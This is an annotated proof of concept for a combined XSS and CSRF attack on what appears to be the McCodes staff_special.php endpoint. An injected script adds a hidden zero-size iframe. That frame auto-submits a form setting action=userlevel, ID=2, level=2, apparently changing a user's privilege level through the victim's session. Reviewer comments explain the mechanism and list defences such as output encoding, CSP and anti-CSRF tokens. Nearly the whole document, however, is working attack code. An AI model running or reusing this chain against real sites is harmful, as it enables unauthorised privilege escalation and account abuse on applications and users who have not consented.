XSS code (the script injected into the affected page):
<script language="javascript" type="text/javascript">
// Demonstration payload: a script that runs in a page through an XSS flaw.
// It appends an iframe pointing at "iframe.html" to the current document.
// The frame gets zero width, height and border plus hidden visibility, so
// nothing is rendered for the person viewing the page.
// NOTE(review): this only executes where the page echoes supplied markup
// unescaped. Context-aware output encoding, plus a Content-Security-Policy
// that restricts script-src and frame-src, stops the chain at this step.
ifrm = document.createElement("IFRAME"); // no var/let: becomes an implicit global
ifrm.setAttribute("src", "iframe.html"); // relative URL, resolved against the hosting page
ifrm.style.width = 0+"px";               // 0+"px" evaluates to the string "0px"
ifrm.style.height = 0+"px";
ifrm.style.border = 0+"px";
ifrm.style.visibility = "hidden";        // hidden, but the framed document still loads
document.body.appendChild(ifrm);         // attaching to the DOM triggers the load of iframe.html
</script>
Contents of iframe.html:
<HTML>
<!--
  Framed document for the cross-site request forgery (CSRF) step of the demo.
  On load, its script builds a form and submits it to staff_special.php with
  no user interaction.
  NOTE(review): the handler is not shown on this page. Judging by the
  parameter names it presumably changes a user's level; confirm against the
  application. A server-side fix would make state-changing actions require
  POST with a per-session anti-CSRF token and re-check the caller's
  privileges; setting SameSite on the session cookie limits cross-site use.
-->
<HEAD>
<TITLE>test</TITLE>
</HEAD>
<script language="javascript" type="text/javascript">
// Build a GET form aimed at the staff endpoint.
var form = document.createElement("form");
form.setAttribute("method", 'get');
form.setAttribute("action", 'http://website.com/mccodes/staff_special.php');
// An Array used as a string-keyed map; the three entries become query parameters.
var params= new Array()
params["action"]="userlevel";
params["ID"]="2";
params["level"]="2";
// for-in walks the enumerable keys set above (and any enumerable properties
// other scripts may have added to Array.prototype).
for(var key in params)
{
// One hidden input per parameter, so the submitted URL carries
// ?action=userlevel&ID=2&level=2, a pattern that can be matched in access logs.
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
//document.body.appendChild(form); //needed for some browsers...
// Submits as soon as the script runs. The browser attaches the cookies it
// holds for the target host (subject to their SameSite setting), which is why
// the endpoint cannot treat the session cookie alone as proof of intent.
form.submit();
</script>
<BODY>
</BODY>
</HTML>